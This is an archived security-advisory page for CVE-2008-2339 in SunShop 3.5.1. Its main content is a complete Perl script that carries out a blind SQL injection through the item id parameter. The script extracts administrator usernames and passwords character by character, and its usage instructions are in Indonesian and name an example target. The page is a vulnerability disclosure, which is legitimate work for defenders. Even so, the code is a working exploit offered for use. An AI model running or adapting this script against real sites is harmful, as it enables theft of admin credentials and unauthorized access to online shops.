|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 3894 CVE : CVE-2008-2339 SecurityRisk : Medium  (About) Remote Exploit : Yes Local Exploit : No Exploit Available : Yes Credit : irvian Published : 19.05.2008
Advisory Content : #!/usr/bin/perl -w use LWP::UserAgent; # scripts : SunShop Version 3.5.1 Remote Blind Sql Injection # scripts site : http://www.turnkeywebtools.com/sunshop/ # Discovered # By : irvian # site : http://irvian.cn # email : irvian.info (at) gmail (dot) com [email concealed] print "rn[+]-----------------------------------------[+]rn"; print "[+]Blind SQL injection [+]rn"; print "[+]SunShop Version 3.5.1 [+]rn"; print "[+]code by irvian [+]rn"; print "[+]special : ifx, arioo, jipank, bluespy [+]rn"; print "[+]-----------------------------------------[+]nr"; if (@ARGV < 5){ die " Cara Mengunakan : perl $0 host option id tabel itemid Keterangan host : http://victim.com Option : pilih 1 untuk mencari username dan pilih 2 untuk mencari password id : Isi Angka Kolom id biasanya 1, 2 ,3 dst tabel : Isi Kolom tabel biasanya admin atau ss_admin itemid : Isi Angka valid (ada productnya) di belakang index.php?action=item&id= Contoh : perl $0 http://www.underhills.com/cart 1 1 admin 10 n";} $url = $ARGV[0]; $option = $ARGV[1]; $id = $ARGV[2]; $tabel = $ARGV[3]; $itemid = $ARGV[4]; if ($option eq 1){ syswrite(STDOUT, "username: ", 10);} elsif ($option eq 2){ syswrite(STDOUT, "password: ", 10);} for($i = 1; $i <= 32; $i++){ $f = 0; $n = 32; while(!$f && $n <= 57) { if(&blind($url, $option, $id, $tabel, $i, $n, $itemid)){ $f = 1; syswrite(STDOUT, chr($n), 1); } $n++; } if ($f==0){ $n = 97; while(!$f && $n <= 122) { if(&blind($url, $option, $id, $tabel, $i, $n, $itemid)){ $f = 1; syswrite(STDOUT, chr($n), 1); } $n++; } } } print "n[+]finish Execution Exploitn"; sub blind { my $site = $_[0]; my $op = $_[1]; my $id = $_[2]; my $tbl = $_[3]; my $i = $_[4]; my $n = $_[5]; my $item = $_[6]; if ($op eq 1){ $klm = "username"; } elsif ($op eq 2){ $klm = "password"; } my $ua = LWP::UserAgent->new; my $url = "$site"."/index.php?action=item&id="."$item"."'%20AND%20SUBSTRING((SELEC T%20"."$klm"."%20FROM%20"."$tbl"."%20WHERE%20id="."$id"."),"."$i".",1)=C HAR("."$n".")/*"; my $res = $ua->get($url); my $browser = $res->content; if ($browser !~ /This product is currently not viewable/i){ return 1; } else { return 0; } }  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
| PHP | |
|
» libzip 0.9.3 |
||
| ADT | ||
Protect your family and valuables with Home Security Systems |
||
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |